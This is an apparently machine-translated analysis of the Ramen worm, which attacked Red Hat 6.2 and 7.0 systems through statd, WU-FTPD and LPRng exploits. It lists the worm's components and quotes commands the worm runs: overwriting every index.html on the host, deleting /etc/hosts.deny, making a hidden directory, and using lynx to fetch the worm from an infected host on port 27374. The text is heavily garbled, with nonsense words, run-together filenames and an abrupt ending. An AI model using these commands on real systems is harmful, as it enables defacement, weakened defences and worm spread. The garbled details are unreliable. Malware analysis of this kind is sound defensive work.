Ramen worm introducing t0pgunadmin@supernj.com Ramen is a worm that uses Redhat's existing remote vulnerability. This worm consists of multiple aggressive Exploit and automatic execution scripts, specifically for RPC.Statd remotely in Redhat 6.2 and Redhat 7.0. Overflow, WU-FTPD, LPD formatted string vulnerability to invade. This worm has been infected with thousands of Linux systems. If you add DDOS in this worm. So harm will be very serious. This worm contains These files ASP: A redhat7's xinetd configuration file, listening port 27374ASP62: A simple HTTPD service daemon. When this service is linked, it provides the buckage of this worm, this worm mainly rely on this service dissemination (for redhat 6.2 ASP7: A simple HTTPD service daemon. When this service is linked, it provides the compression package of this worm, which mainly rely on this service dissemination (for redhat 7.0) BD62.SH: Worm installer for redhat 6.2bd7 . SH: Worm installer for redhat 7.0Getip.sh: Gets the script for host IP.Hackl.sh: Read .l file. Write the address to lh.shckw.sh: read .w file. And put the address Writing WH.SHINDEX.HTML: HTML text. Worm with this text Replace host's Home L62: Modified LPRNG Format string Attack Program for Redhat 6.2l7: Modified Lprng Format string Attack for Redhat 7.0lh.sh: Execute LPRNG EXPLOIT Randb62: Random Generate a Class B IP Address for Redhat 6.2randb7: Random Generate a Class B IP Address for RedHat 7.0s62: Modified Statdx Exploit for RedHat 6.2s7: Modify STATDX's exploit for redhat 7 scan: A Class B network address is obtained from the RANDB program. Then run SYNSCANSTART.SH: This worm start program start62.sh: Background starts Scan.sh, Hackl.sh, Hackw.sh Script Start7.sh: and start62.sh equally functional SYNSCAN62: Modified SYNSCAN For redhat 6.2synscan7: Modified SYNSCAN For Redhat 7 W62: Modified Wu-ftpd 2.6 Expolit for Redhat 6.2W7: Modified Wu-ftpd 2.6 EXPOLIT for Redhat 7.0Wh.sh: Run Exploit script wu62: Modified Wu-ftp 2.6 Exploit It is like this: intruder first attacks into a redhat6.2 or 7.0, uploading this worm, running Start.sh script, infected the first redhat.Start.sh, first Find the host's web main page and replace it with your own page Nohup Find / -Name "index.html" -exec / bin / cp index.html {} /; & quinth then remove Hosts.deny file RM -F / ETC / Hosts.dey then runs Getip.SH to take the IP address of this host, simply determine that this system is redhat6.2 or 7.0 installation of the corresponding service file, start working. Theramen Worm scans the random address range, depending on the ftp banner retrieved. Port information to determine the Redhat system. Perform the corresponding invasion. When RAMEN enters another system, it will do the following operations on the system: first in / usr / src / build hidden directory. Poop / mkdir /usr/src/.poop; Cd /usr/src/.poop then passed the Worm file on the machine that has been in the machine through the Lynx. orx -source http://% s: 27374>